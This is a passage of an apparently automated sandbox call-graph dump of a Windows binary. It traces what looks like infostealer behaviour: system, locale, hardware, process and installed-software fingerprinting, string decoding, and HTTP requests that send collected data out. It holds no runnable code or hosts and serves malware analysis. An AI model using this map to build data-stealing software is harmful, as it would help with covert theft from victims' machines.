694d92 14752->14753 14754 6aa920 3 API calls 14753->14754 14755 694db3 14754->14755 14756 6aa920 3 API calls 14755->14756 14757 694dba 14756->14757 14758 6aa8a0 lstrcpy 14757->14758 14759 694dc6 14758->14759 14760 694de7 lstrlen 14759->14760 14761 694dfa 14760->14761 14762 694e03 lstrlen 14761->14762 15701 6aaad0 14762->15701 14764 694e13 HttpSendRequestA 14765 694e32 InternetReadFile 14764->14765 14766 694e67 InternetCloseHandle 14765->14766 14771 694e5e 14765->14771 14769 6aa800 14766->14769 14768 6aa9b0 4 API calls 14768->14771 14769->14691 14770 6aa8a0 lstrcpy 14770->14771 14771->14765 14771->14766 14771->14768 14771->14770 15708 6aaad0 14772->15708 14774 6a17c4 StrCmpCA 14775 6a17cf ExitProcess 14774->14775 14777 6a17d7 14774->14777 14776 6a19c2 14776->13695 14777->14776 14778 6a18cf StrCmpCA 14777->14778 14779 6a18ad StrCmpCA 14777->14779 14780 6a187f StrCmpCA 14777->14780 14781 6a185d StrCmpCA 14777->14781 14782 6a1932 StrCmpCA 14777->14782 14783 6a1913 StrCmpCA 14777->14783 14784 6a1970 StrCmpCA 14777->14784 14785 6a18f1 StrCmpCA 14777->14785 14786 6a1951 StrCmpCA 14777->14786 14787 6aa820 lstrlen lstrcpy 14777->14787 14778->14777 14779->14777 14780->14777 14781->14777 14782->14777 14783->14777 14784->14777 14785->14777 14786->14777 14787->14777 14789 6aa7a0 lstrcpy 14788->14789 14790 695979 14789->14790 14791 6947b0 2 API calls 14790->14791 14792 695985 14791->14792 14793 6aa740 lstrcpy 14792->14793 14794 6959ba 14793->14794 14795 6aa740 lstrcpy 14794->14795 14796 6959c7 14795->14796 14797 6aa740 lstrcpy 14796->14797 14798 6959d4 14797->14798 14799 6aa740 lstrcpy 14798->14799 14800 6959e1 14799->14800 14801 6aa740 lstrcpy 14800->14801 14802 6959ee InternetOpenA StrCmpCA 14801->14802 14803 695a1d 14802->14803 14804 695fc3 InternetCloseHandle 14803->14804 14805 6a8b60 3 API calls 14803->14805 14806 695fe0 14804->14806 14807 695a3c 14805->14807 14809 699ac0 4 API calls 14806->14809 14808 6aa920 3 API calls 14807->14808 14810 695a4f 14808->14810 14811 695fe6 14809->14811 14812 6aa8a0 lstrcpy 14810->14812 14813 6aa820 2 API calls 14811->14813 14816 69601f codecvt 14811->14816 14818 695a58 14812->14818 14814 695ffd 14813->14814 14815 6aa9b0 4 API calls 14814->14815 14817 696013 14815->14817 14820 6aa7a0 lstrcpy 14816->14820 14819 6aa8a0 lstrcpy 14817->14819 14821 6aa9b0 4 API calls 14818->14821 14819->14816 14829 69604f 14820->14829 14822 695a82 14821->14822 14823 6aa8a0 lstrcpy 14822->14823 14824 695a8b 14823->14824 14825 6aa9b0 4 API calls 14824->14825 14826 695aaa 14825->14826 14827 6aa8a0 lstrcpy 14826->14827 14828 695ab3 14827->14828 14830 6aa920 3 API calls 14828->14830 14829->13701 14831 695ad1 14830->14831 14832 6aa8a0 lstrcpy 14831->14832 14833 695ada 14832->14833 14834 6aa9b0 4 API calls 14833->14834 14835 695af9 14834->14835 14836 6aa8a0 lstrcpy 14835->14836 14837 695b02 14836->14837 14838 6aa9b0 4 API calls 14837->14838 14839 695b21 14838->14839 14840 6aa8a0 lstrcpy 14839->14840 14841 695b2a 14840->14841 14842 6aa9b0 4 API calls 14841->14842 14843 695b56 14842->14843 14844 6aa920 3 API calls 14843->14844 14845 695b5d 14844->14845 14846 6aa8a0 lstrcpy 14845->14846 14847 695b66 14846->14847 14848 695b7c InternetConnectA 14847->14848 14848->14804 14849 695bac HttpOpenRequestA 14848->14849 14851 695c0b 14849->14851 14852 695fb6 InternetCloseHandle 14849->14852 14853 6aa9b0 4 API calls 14851->14853 14852->14804 14854 695c1f 14853->14854 14855 6aa8a0 lstrcpy 14854->14855 14856 695c28 14855->14856 14857 6aa920 3 API calls 14856->14857 14858 695c46 14857->14858 14859 6aa8a0 lstrcpy 14858->14859 14860 695c4f 14859->14860 14861 6aa9b0 4 API calls 14860->14861 14862 695c6e 14861->14862 14863 6aa8a0 lstrcpy 14862->14863 14864 695c77 14863->14864 14865 6aa9b0 4 API calls 14864->14865 14866 695c98 14865->14866 14867 6aa8a0 lstrcpy 14866->14867 14868 695ca1 14867->14868 14869 6aa9b0 4 API calls 14868->14869 14870 695cc1 14869->14870 14871 6aa8a0 lstrcpy 14870->14871 14872 695cca 14871->14872 14873 6aa9b0 4 API calls 14872->14873 14874 695ce9 14873->14874 14875 6aa8a0 lstrcpy 14874->14875 14876 695cf2 14875->14876 14877 6aa920 3 API calls 14876->14877 14878 695d10 14877->14878 14879 6aa8a0 lstrcpy 14878->14879 14880 695d19 14879->14880 14881 6aa9b0 4 API calls 14880->14881 14882 695d38 14881->14882 14883 6aa8a0 lstrcpy 14882->14883 14884 695d41 14883->14884 14885 6aa9b0 4 API calls 14884->14885 14886 695d60 14885->14886 14887 6aa8a0 lstrcpy 14886->14887 14888 695d69 14887->14888 14889 6aa920 3 API calls 14888->14889 14890 695d87 14889->14890 14891 6aa8a0 lstrcpy 14890->14891 14892 695d90 14891->14892 14893 6aa9b0 4 API calls 14892->14893 14894 695daf 14893->14894 14895 6aa8a0 lstrcpy 14894->14895 14896 695db8 14895->14896 14897 6aa9b0 4 API calls 14896->14897 14898 695dd9 14897->14898 14899 6aa8a0 lstrcpy 14898->14899 14900 695de2 14899->14900 14901 6aa9b0 4 API calls 14900->14901 14902 695e02 14901->14902 14903 6aa8a0 lstrcpy 14902->14903 14904 695e0b 14903->14904 14905 6aa9b0 4 API calls 14904->14905 14906 695e2a 14905->14906 14907 6aa8a0 lstrcpy 14906->14907 14908 695e33 14907->14908 14909 6aa920 3 API calls 14908->14909 14910 695e54 14909->14910 14911 6aa8a0 lstrcpy 14910->14911 14912 695e5d 14911->14912 14913 695e70 lstrlen 14912->14913 15709 6aaad0 14913->15709 14915 695e81 lstrlen GetProcessHeap RtlAllocateHeap 15710 6aaad0 14915->15710 14917 695eae lstrlen 14918 695ebe 14917->14918 14919 695ed7 lstrlen 14918->14919 14920 695ee7 14919->14920 14921 695ef0 lstrlen 14920->14921 14922 695f04 14921->14922 14923 695f1a lstrlen 14922->14923 15711 6aaad0 14923->15711 14925 695f2a HttpSendRequestA 14926 695f35 InternetReadFile 14925->14926 14927 695f6a InternetCloseHandle 14926->14927 14931 695f61 14926->14931 14927->14852 14929 6aa9b0 4 API calls 14929->14931 14930 6aa8a0 lstrcpy 14930->14931 14931->14926 14931->14927 14931->14929 14931->14930 14933 6a1077 14932->14933 14934 6a1151 14933->14934 14935 6aa820 lstrlen lstrcpy 14933->14935 14934->13703 14935->14933 14938 6a0db7 14936->14938 14937 6a0f17 14937->13711 14938->14937 14939 6a0e27 StrCmpCA 14938->14939 14940 6a0e67 StrCmpCA 14938->14940 14941 6a0ea4 StrCmpCA 14938->14941 14942 6aa820 lstrlen lstrcpy 14938->14942 14939->14938 14940->14938 14941->14938 14942->14938 14944 6a0f67 14943->14944 14945 6a1044 14944->14945 14946 6a0fb2 StrCmpCA 14944->14946 14947 6aa820 lstrlen lstrcpy 14944->14947 14945->13719 14946->14944 14947->14944 14949 6aa740 lstrcpy 14948->14949 14950 6a1a26 14949->14950 14951 6aa9b0 4 API calls 14950->14951 14952 6a1a37 14951->14952 14953 6aa8a0 lstrcpy 14952->14953 14954 6a1a40 14953->14954 14955 6aa9b0 4 API calls 14954->14955 14956 6a1a5b 14955->14956 14957 6aa8a0 lstrcpy 14956->14957 14958 6a1a64 14957->14958 14959 6aa9b0 4 API calls 14958->14959 14960 6a1a7d 14959->14960 14961 6aa8a0 lstrcpy 14960->14961 14962 6a1a86 14961->14962 14963 6aa9b0 4 API calls 14962->14963 14964 6a1aa1 14963->14964 14965 6aa8a0 lstrcpy 14964->14965 14966 6a1aaa 14965->14966 14967 6aa9b0 4 API calls 14966->14967 14968 6a1ac3 14967->14968 14969 6aa8a0 lstrcpy 14968->14969 14970 6a1acc 14969->14970 14971 6aa9b0 4 API calls 14970->14971 14972 6a1ae7 14971->14972 14973 6aa8a0 lstrcpy 14972->14973 14974 6a1af0 14973->14974 14975 6aa9b0 4 API calls 14974->14975 14976 6a1b09 14975->14976 14977 6aa8a0 lstrcpy 14976->14977 14978 6a1b12 14977->14978 14979 6aa9b0 4 API calls 14978->14979 14980 6a1b2d 14979->14980 14981 6aa8a0 lstrcpy 14980->14981 14982 6a1b36 14981->14982 14983 6aa9b0 4 API calls 14982->14983 14984 6a1b4f 14983->14984 14985 6aa8a0 lstrcpy 14984->14985 14986 6a1b58 14985->14986 14987 6aa9b0 4 API calls 14986->14987 14988 6a1b76 14987->14988 14989 6aa8a0 lstrcpy 14988->14989 14990 6a1b7f 14989->14990 14991 6a7500 6 API calls 14990->14991 14992 6a1b96 14991->14992 14993 6aa920 3 API calls 14992->14993 14994 6a1ba9 14993->14994 14995 6aa8a0 lstrcpy 14994->14995 14996 6a1bb2 14995->14996 14997 6aa9b0 4 API calls 14996->14997 14998 6a1bdc 14997->14998 14999 6aa8a0 lstrcpy 14998->14999 15000 6a1be5 14999->15000 15001 6aa9b0 4 API calls 15000->15001 15002 6a1c05 15001->15002 15003 6aa8a0 lstrcpy 15002->15003 15004 6a1c0e 15003->15004 15712 6a7690 GetProcessHeap RtlAllocateHeap 15004->15712 15007 6aa9b0 4 API calls 15008 6a1c2e 15007->15008 15009 6aa8a0 lstrcpy 15008->15009 15010 6a1c37 15009->15010 15011 6aa9b0 4 API calls 15010->15011 15012 6a1c56 15011->15012 15013 6aa8a0 lstrcpy 15012->15013 15014 6a1c5f 15013->15014 15015 6aa9b0 4 API calls 15014->15015 15016 6a1c80 15015->15016 15017 6aa8a0 lstrcpy 15016->15017 15018 6a1c89 15017->15018 15719 6a77c0 GetCurrentProcess IsWow64Process 15018->15719 15021 6aa9b0 4 API calls 15022 6a1ca9 15021->15022 15023 6aa8a0 lstrcpy 15022->15023 15024 6a1cb2 15023->15024 15025 6aa9b0 4 API calls 15024->15025 15026 6a1cd1 15025->15026 15027 6aa8a0 lstrcpy 15026->15027 15028 6a1cda 15027->15028 15029 6aa9b0 4 API calls 15028->15029 15030 6a1cfb 15029->15030 15031 6aa8a0 lstrcpy 15030->15031 15032 6a1d04 15031->15032 15033 6a7850 3 API calls 15032->15033 15034 6a1d14 15033->15034 15035 6aa9b0 4 API calls 15034->15035 15036 6a1d24 15035->15036 15037 6aa8a0 lstrcpy 15036->15037 15038 6a1d2d 15037->15038 15039 6aa9b0 4 API calls 15038->15039 15040 6a1d4c 15039->15040 15041 6aa8a0 lstrcpy 15040->15041 15042 6a1d55 15041->15042 15043 6aa9b0 4 API calls 15042->15043 15044 6a1d75 15043->15044 15045 6aa8a0 lstrcpy 15044->15045 15046 6a1d7e 15045->15046 15047 6a78e0 3 API calls 15046->15047 15048 6a1d8e 15047->15048 15049 6aa9b0 4 API calls 15048->15049 15050 6a1d9e 15049->15050 15051 6aa8a0 lstrcpy 15050->15051 15052 6a1da7 15051->15052 15053 6aa9b0 4 API calls 15052->15053 15054 6a1dc6 15053->15054 15055 6aa8a0 lstrcpy 15054->15055 15056 6a1dcf 15055->15056 15057 6aa9b0 4 API calls 15056->15057 15058 6a1df0 15057->15058 15059 6aa8a0 lstrcpy 15058->15059 15060 6a1df9 15059->15060 15721 6a7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15060->15721 15063 6aa9b0 4 API calls 15064 6a1e19 15063->15064 15065 6aa8a0 lstrcpy 15064->15065 15066 6a1e22 15065->15066 15067 6aa9b0 4 API calls 15066->15067 15068 6a1e41 15067->15068 15069 6aa8a0 lstrcpy 15068->15069 15070 6a1e4a 15069->15070 15071 6aa9b0 4 API calls 15070->15071 15072 6a1e6b 15071->15072 15073 6aa8a0 lstrcpy 15072->15073 15074 6a1e74 15073->15074 15723 6a7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15074->15723 15077 6aa9b0 4 API calls 15078 6a1e94 15077->15078 15079 6aa8a0 lstrcpy 15078->15079 15080 6a1e9d 15079->15080 15081 6aa9b0 4 API calls 15080->15081 15082 6a1ebc 15081->15082 15083 6aa8a0 lstrcpy 15082->15083 15084 6a1ec5 15083->15084 15085 6aa9b0 4 API calls 15084->15085 15086 6a1ee5 15085->15086 15087 6aa8a0 lstrcpy 15086->15087 15088 6a1eee 15087->15088 15726 6a7b00 GetUserDefaultLocaleName 15088->15726 15091 6aa9b0 4 API calls 15092 6a1f0e 15091->15092 15093 6aa8a0 lstrcpy 15092->15093 15094 6a1f17 15093->15094 15095 6aa9b0 4 API calls 15094->15095 15096 6a1f36 15095->15096 15097 6aa8a0 lstrcpy 15096->15097 15098 6a1f3f 15097->15098 15099 6aa9b0 4 API calls 15098->15099 15100 6a1f60 15099->15100 15101 6aa8a0 lstrcpy 15100->15101 15102 6a1f69 15101->15102 15730 6a7b90 15102->15730 15104 6a1f80 15105 6aa920 3 API calls 15104->15105 15106 6a1f93 15105->15106 15107 6aa8a0 lstrcpy 15106->15107 15108 6a1f9c 15107->15108 15109 6aa9b0 4 API calls 15108->15109 15110 6a1fc6 15109->15110 15111 6aa8a0 lstrcpy 15110->15111 15112 6a1fcf 15111->15112 15113 6aa9b0 4 API calls 15112->15113 15114 6a1fef 15113->15114 15115 6aa8a0 lstrcpy 15114->15115 15116 6a1ff8 15115->15116 15742 6a7d80 GetSystemPowerStatus 15116->15742 15119 6aa9b0 4 API calls 15120 6a2018 15119->15120 15121 6aa8a0 lstrcpy 15120->15121 15122 6a2021 15121->15122 15123 6aa9b0 4 API calls 15122->15123 15124 6a2040 15123->15124 15125 6aa8a0 lstrcpy 15124->15125 15126 6a2049 15125->15126 15127 6aa9b0 4 API calls 15126->15127 15128 6a206a 15127->15128 15129 6aa8a0 lstrcpy 15128->15129 15130 6a2073 15129->15130 15131 6a207e GetCurrentProcessId 15130->15131 15744 6a9470 OpenProcess 15131->15744 15134 6aa920 3 API calls 15135 6a20a4 15134->15135 15136 6aa8a0 lstrcpy 15135->15136 15137 6a20ad 15136->15137 15138 6aa9b0 4 API calls 15137->15138 15139 6a20d7 15138->15139 15140 6aa8a0 lstrcpy 15139->15140 15141 6a20e0 15140->15141 15142 6aa9b0 4 API calls 15141->15142 15143 6a2100 15142->15143 15144 6aa8a0 lstrcpy 15143->15144 15145 6a2109 15144->15145 15749 6a7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15145->15749 15148 6aa9b0 4 API calls 15149 6a2129 15148->15149 15150 6aa8a0 lstrcpy 15149->15150 15151 6a2132 15150->15151 15152 6aa9b0 4 API calls 15151->15152 15153 6a2151 15152->15153 15154 6aa8a0 lstrcpy 15153->15154 15155 6a215a 15154->15155 15156 6aa9b0 4 API calls 15155->15156 15157 6a217b 15156->15157 15158 6aa8a0 lstrcpy 15157->15158 15159 6a2184 15158->15159 15753 6a7f60 15159->15753 15162 6aa9b0 4 API calls 15163 6a21a4 15162->15163 15164 6aa8a0 lstrcpy 15163->15164 15165 6a21ad 15164->15165 15166 6aa9b0 4 API calls 15165->15166 15167 6a21cc 15166->15167 15168 6aa8a0 lstrcpy 15167->15168 15169 6a21d5 15168->15169 15170 6aa9b0 4 API calls 15169->15170 15171 6a21f6 15170->15171 15172 6aa8a0 lstrcpy 15171->15172 15173 6a21ff 15172->15173 15766 6a7ed0 GetSystemInfo wsprintfA 15173->15766 15176 6aa9b0 4 API calls 15177 6a221f 15176->15177 15178 6aa8a0 lstrcpy 15177->15178 15179 6a2228 15178->15179 15180 6aa9b0 4 API calls 15179->15180 15181 6a2247 15180->15181 15182 6aa8a0 lstrcpy 15181->15182 15183 6a2250 15182->15183 15184 6aa9b0 4 API calls 15183->15184 15185 6a2270 15184->15185 15186 6aa8a0 lstrcpy 15185->15186 15187 6a2279 15186->15187 15768 6a8100 GetProcessHeap RtlAllocateHeap 15187->15768 15190 6aa9b0 4 API calls 15191 6a2299 15190->15191 15192 6aa8a0 lstrcpy 15191->15192 15193 6a22a2 15192->15193 15194 6aa9b0 4 API calls 15193->15194 15195 6a22c1 15194->15195 15196 6aa8a0 lstrcpy 15195->15196 15197 6a22ca 15196->15197 15198 6aa9b0 4 API calls 15197->15198 15199 6a22eb 15198->15199 15200 6aa8a0 lstrcpy 15199->15200 15201 6a22f4 15200->15201 15774 6a87c0 15201->15774 15204 6aa920 3 API calls 15205 6a231e 15204->15205 15206 6aa8a0 lstrcpy 15205->15206 15207 6a2327 15206->15207 15208 6aa9b0 4 API calls 15207->15208 15209 6a2351 15208->15209 15210 6aa8a0 lstrcpy 15209->15210 15211 6a235a 15210->15211 15212 6aa9b0 4 API calls 15211->15212 15213 6a237a 15212->15213 15214 6aa8a0 lstrcpy 15213->15214 15215 6a2383 15214->15215 15216 6aa9b0 4 API calls 15215->15216 15217 6a23a2 15216->15217 15218 6aa8a0 lstrcpy 15217->15218 15219 6a23ab 15218->15219 15779 6a81f0 15219->15779 15221 6a23c2 15222 6aa920 3 API calls 15221->15222 15223 6a23d5 15222->15223 15224 6aa8a0 lstrcpy 15223->15224 15225 6a23de 15224->15225 15226 6aa9b0 4 API calls 15225->15226 15227 6a240a 15226->15227 15228 6aa8a0 lstrcpy 15227->15228 15229 6a2413 15228->15229 15230 6aa9b0 4 API calls 15229->15230 15231 6a2432 15230->15231 15232 6aa8a0 lstrcpy 15231->15232 15233 6a243b 15232->15233 15234 6aa9b0 4 API calls 15233->15234 15235 6a245c 15234->15235 15236 6aa8a0 lstrcpy 15235->15236 15237 6a2465 15236->15237 15238 6aa9b0 4 API calls 15237->15238 15239 6a2484 15238->15239 15240 6aa8a0 lstrcpy 15239->15240 15241 6a248d 15240->15241 15242 6aa9b0 4 API calls 15241->15242 15243 6a24ae 15242->15243 15244 6aa8a0 lstrcpy 15243->15244 15245 6a24b7 15244->15245 15787 6a8320 15245->15787 15247 6a24d3 15248 6aa920 3 API calls 15247->15248 15249 6a24e6 15248->15249 15250 6aa8a0 lstrcpy 15249->15250 15251 6a24ef 15250->15251 15252 6aa9b0 4 API calls 15251->15252 15253 6a2519 15252->15253 15254 6aa8a0 lstrcpy 15253->15254 15255 6a2522 15254->15255 15256 6aa9b0 4 API calls 15255->15256 15257 6a2543 15256->15257 15258 6aa8a0 lstrcpy 15257->15258 15259 6a254c 15258->15259 15260 6a8320 17 API calls 15259->15260 15261 6a2568 15260->15261 15262 6aa920 3 API calls 15261->15262 15263 6a257b 15262->15263 15264 6aa8a0 lstrcpy 15263->15264 15265 6a2584 15264->15265 15266 6aa9b0 4 API calls 15265->15266 15267 6a25ae 15266->15267 15268 6aa8a0 lstrcpy 15267->15268 15269 6a25b7 15268->15269 15270 6aa9b0 4 API calls 15269->15270 15271 6a25d6 15270->15271 15272 6aa8a0 lstrcpy 15271->15272 15273 6a25df 15272->15273 15274 6aa9b0 4 API calls 15273->15274 15275 6a2600 15274->15275 15276 6aa8a0 lstrcpy 15275->15276 15277 6a2609 15276->15277 15823 6a8680 15277->15823 15279 6a2620 15280 6aa920 3 API calls 15279->15280 15281 6a2633 15280->15281 15282 6aa8a0 lstrcpy 15281->15282 15283 6a263c 15282->15283 15284 6a265a lstrlen 15283->15284 15285 6a266a 15284->15285 15286 6aa740 lstrcpy 15285->15286 15287 6a267c 15286->15287 15288 691590 lstrcpy 15287->15288 15289 6a268d 15288->15289 15833 6a5190 15289->15833 15291 6a2699 15291->13723 16021 6aaad0 15292->16021 15294 695009 InternetOpenUrlA 15298 695021 15294->15298 15295 69502a InternetReadFile 15295->15298 15296 6950a0 InternetCloseHandle InternetCloseHandle 15297 6950ec 15296->15297 15297->13727 15298->15295 15298->15296 16022 6998d0 15299->16022 15301 6a0759 15302 6a0a38 15301->15302 15303 6a077d 15301->15303 15304 691590 lstrcpy 15302->15304 15306 6a0799 StrCmpCA 15303->15306 15305 6a0a49 15304->15305 16198 6a0250 15305->16198 15308 6a07a8 15306->15308 15333 6a0843 15306->15333 15309 6aa7a0 lstrcpy 15308->15309 15312 6a07c3 15309->15312 15311 6a0865 StrCmpCA 15313 6a0874 15311->15313 15351 6a096b 15311->15351 15314 691590 lstrcpy 15312->15314 15315 6aa740 lstrcpy 15313->15315 15316 6a080c 15314->15316 15318 6a0881 15315->15318 15319 6aa7a0 lstrcpy 15316->15319 15317 6a099c StrCmpCA 15321 6a09ab 15317->15321 15322 6a0a2d 15317->15322 15323 6aa9b0 4 API calls 15318->15323 15320 6a0823 15319->15320 15324 6aa7a0 lstrcpy 15320->15324 15325 691590 lstrcpy 15321->15325 15322->13731 15326 6a08ac 15323->15326 15327 6a083e 15324->15327 15328 6a09f4 15325->15328 15329 6aa920 3 API calls 15326->15329 16025 69fb00 15327->16025 15331 6aa7a0 lstrcpy 15328->15331 15332 6a08b3 15329->15332 15334 6a0a0d 15331->15334 15335 6aa9b0 4 API calls 15332->15335 15333->15311 15337 6aa7a0 lstrcpy 15334->15337 15336 6a08ba 15335->15336 15338 6aa8a0 lstrcpy 15336->15338 15339 6a0a28 15337->15339 15351->15317 15673 6aa7a0 lstrcpy 15672->15673 15674 691683 15673->15674 15675 6aa7a0 lstrcpy 15674->15675 15676 691695 15675->15676 15677 6aa7a0 lstrcpy 15676->15677 15678 6916a7 15677->15678 15679 6aa7a0 lstrcpy 15678->15679 15680 6915a3 15679->15680 15680->14554 15682 6947c6 15681->15682 15683 694838 lstrlen 15682->15683 15707 6aaad0 15683->15707 15685 694848 InternetCrackUrlA 15686 694867 15685->15686 15686->14631 15688 6aa740 lstrcpy 15687->15688 15689 6a8b74 15688->15689 15690 6aa740 lstrcpy 15689->15690 15691 6a8b82 GetSystemTime 15690->15691 15693 6a8b99 15691->15693 15692 6aa7a0 lstrcpy 15694 6a8bfc 15692->15694 15693->15692 15694->14646 15696 6aa931 15695->15696 15697 6aa988 15696->15697 15699 6aa968 lstrcpy lstrcat 15696->15699 15698 6aa7a0 lstrcpy 15697->15698 15700 6aa994 15698->15700 15699->15697 15700->14649 15701->14764 15703 699af9 LocalAlloc 15702->15703 15704 694eee 15702->15704 15703->15704 15705 699b14 CryptStringToBinaryA 15703->15705 15704->14652 15704->14655 15705->15704 15706 699b39 LocalFree 15705->15706 15706->15704 15707->15685 15708->14774 15709->14915 15710->14917 15711->14925 15840 6a77a0 15712->15840 15715 6a1c1e 15715->15007 15716 6a76c6 RegOpenKeyExA 15717 6a76e7 RegQueryValueExA 15716->15717 15718 6a7704 RegCloseKey 15716->15718 15717->15718 15718->15715 15720 6a1c99 15719->15720 15720->15021 15722 6a1e09 15721->15722 15722->15063 15724 6a7a9a wsprintfA 15723->15724 15725 6a1e84 15723->15725 15724->15725 15725->15077 15727 6a7b4d 15726->15727 15728 6a1efe 15726->15728 15847 6a8d20 LocalAlloc CharToOemW 15727->15847 15728->15091 15731 6aa740 lstrcpy 15730->15731 15732 6a7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15731->15732 15741 6a7c25 15732->15741 15733 6a7d18 15735 6a7d28 15733->15735 15736 6a7d1e LocalFree 15733->15736 15734 6a7c46 GetLocaleInfoA 15734->15741 15737 6aa7a0 lstrcpy 15735->15737 15736->15735 15740 6a7d37 15737->15740 15738 6aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15738->15741 15739 6aa8a0 lstrcpy 15739->15741 15740->15104 15741->15733 15741->15734 15741->15738 15741->15739 15743 6a2008 15742->15743 15743->15119 15745 6a9493 GetModuleFileNameExA CloseHandle 15744->15745 15746 6a94b5 15744->15746 15745->15746 15747 6aa740 lstrcpy 15746->15747 15748 6a2091 15747->15748 15748->15134 15750 6a7e68 RegQueryValueExA 15749->15750 15751 6a2119 15749->15751 15752 6a7e8e RegCloseKey 15750->15752 15751->15148 15752->15751 15754 6a7fb9 GetLogicalProcessorInformationEx 15753->15754 15755 6a7fd8 GetLastError 15754->15755 15756 6a8029 15754->15756 15758 6a8022 15755->15758 15763 6a7fe3 15755->15763 15762 6a89f0 2 API calls 15756->15762 15757 6a2194 15757->15162 15758->15757 15761 6a89f0 2 API calls 15758->15761 15761->15757 15764 6a807b 15762->15764 15763->15754 15763->15757 15848 6a89f0 15763->15848 15851 6a8a10 GetProcessHeap RtlAllocateHeap 15763->15851 15764->15758 15765 6a8084 wsprintfA 15764->15765 15765->15757 15767 6a220f 15766->15767 15767->15176 15769 6a89b0 15768->15769 15770 6a814d GlobalMemoryStatusEx 15769->15770 15773 6a8163 15770->15773 15771 6a819b wsprintfA 15772 6a2289 15771->15772 15772->15190 15773->15771 15775 6a87fb GetProcessHeap RtlAllocateHeap wsprintfA 15774->15775 15777 6aa740 lstrcpy 15775->15777 15778 6a230b 15777->15778 15778->15204 15780 6aa740 lstrcpy 15779->15780 15786 6a8229 15780->15786 15781 6a8263 15783 6aa7a0 lstrcpy 15781->15783 15782 6aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15782->15786 15784 6a82dc 15783->15784 15784->15221 15785 6aa8a0 lstrcpy 15785->15786 15786->15781 15786->15782 15786->15785 15788 6aa740 lstrcpy 15787->15788 15789 6a835c RegOpenKeyExA 15788->15789 15790 6a83ae 15789->15790 15791 6a83d0 15789->15791 15792 6aa7a0 lstrcpy 15790->15792 15793 6a83f8 RegEnumKeyExA 15791->15793 15794 6a8613 RegCloseKey 15791->15794 15803 6a83bd 15792->15803 15796 6a860e 15793->15796 15797 6a843f wsprintfA RegOpenKeyExA 15793->15797 15795 6aa7a0 lstrcpy 15794->15795 15795->15803 15796->15794 15798 6a84c1 RegQueryValueExA 15797->15798 15799 6a8485 RegCloseKey RegCloseKey 15797->15799 15800 6a84fa lstrlen 15798->15800 15801 6a8601 RegCloseKey 15798->15801 15802 6aa7a0 lstrcpy 15799->15802 15800->15801 15804 6a8510 15800->15804 15801->15796 15802->15803 15803->15247 15805 6aa9b0 4 API calls 15804->15805 15806 6a8527 15805->15806 15807 6aa8a0 lstrcpy 15806->15807 15808 6a8533 15807->15808 15809 6aa9b0 4 API calls 15808->15809 15810 6a8557 15809->15810 15811 6aa8a0 lstrcpy 15810->15811 15812 6a8563 15811->15812 15813 6a856e RegQueryValueExA 15812->15813 15813->15801 15814 6a85a3 15813->15814 15815 6aa9b0 4 API calls 15814->15815 15816 6a85ba 15815->15816 15817 6aa8a0 lstrcpy 15816->15817 15818 6a85c6 15817->15818 15819 6aa9b0 4 API calls 15818->15819 15820 6a85ea 15819->15820 15821 6aa8a0 lstrcpy 15820->15821 15822 6a85f6 15821->15822 15822->15801 15824 6aa740 lstrcpy 15823->15824 15825 6a86bc CreateToolhelp32Snapshot Process32First 15824->15825 15826 6a86e8 Process32Next 15825->15826 15827 6a875d CloseHandle 15825->15827 15826->15827 15832 6a86fd 15826->15832 15828 6aa7a0 lstrcpy 15827->15828 15831 6a8776 15828->15831 15829 6aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15829->15832 15830 6aa8a0 lstrcpy 15830->15832 15831->15279 15832->15826 15832->15829 15832->15830 15834 6aa7a0 lstrcpy 15833->15834 15835 6a51b5 15834->15835 15836 691590 lstrcpy 15835->15836 15837 6a51c6 15836->15837 15852 695100 15837->15852 15839 6a51cf 15839->15291 15843 6a7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15840->15843 15842 6a76b9 15842->15715 15842->15716 15844 6a7780 RegCloseKey 15843->15844 15845 6a7765 RegQueryValueExA 15843->15845 15846 6a7793 15844->15846 15845->15844 15846->15842 15847->15728 15849 6a89f9 GetProcessHeap HeapFree 15848->15849 15850 6a8a0c 15848->15850 15849->15850 15850->15763 15851->15763 15853 6aa7a0 lstrcpy 15852->15853 15854 695119 15853->15854 15855 6947b0 2 API calls 15854->15855 15856 695125 15855->15856 16012 6a8ea0 15856->16012 15858 695184 15859 695192 lstrlen 15858->15859 15860 6951a5 15859->15860 15861 6a8ea0 4 API calls 15860->15861 15862 6951b6 15861->15862 15863 6aa740 lstrcpy 15862->15863 15864 6951c9 15863->15864 15865 6aa740 lstrcpy 15864->15865 15866 6951d6 15865->15866 15867 6aa740 lstrcpy 15866->15867 15868 6951e3 15867->15868 15869 6aa740 lstrcpy 15868->15869 15870 6951f0 15869->15870 15871 6aa740 lstrcpy 15870->15871 15872 6951fd InternetOpenA StrCmpCA 15871->15872 15873 69522f 15872->15873 15874 6958c4 InternetCloseHandle 15873->15874 15875 6a8b60 3 API calls 15873->15875 15881 6958d9 codecvt 15874->15881 15876 69524e 15875->15876 15877 6aa920 3 API calls 15876->15877 15878 695261 15877->15878 15879 6aa8a0 lstrcpy 15878->15879 15880 69526a 15879->15880 15882 6aa9b0 4 API calls 15880->15882 15884 6aa7a0 lstrcpy 15881->15884 15883 6952ab 15882->15883 15885 6aa920 3 API calls 15883->15885 15893 695913 15884->15893 15886 6952b2 15885->15886 15887 6aa9b0 4 API calls 15886->15887 15888 6952b9 15887->15888 15889 6aa8a0 lstrcpy 15888->15889 15890 6952c2 15889->15890 15891 6aa9b0 4 API calls 15890->15891 15892 695303 15891->15892 15894 6aa920 3 API calls 15892->15894 15893->15839 15895 69530a 15894->15895 15896 6aa8a0 lstrcpy 15895->15896 15897 695313 15896->15897 15898 695329 InternetConnectA 15897->15898 15898->15874 15899 695359 HttpOpenRequestA 15898->15899 15901 6958b7 InternetCloseHandle 15899->15901 15902 6953b7 15899->15902 15901->15874 15903 6aa9b0 4 API calls 15902->15903 15904 6953cb 15903->15904 15905 6aa8a0 lstrcpy 15904->15905 15906 6953d4 15905->15906 15907 6aa920 3 API calls 15906->15907 15908 6953f2 15907->15908 15909 6aa8a0 lstrcpy 15908->15909 15910 6953fb 15909->15910 15911 6aa9b0 4 API calls 15910->15911 15912 69541a 15911->15912 15913 6aa8a0 lstrcpy 15912->15913 15914 695423 15913->15914 15915 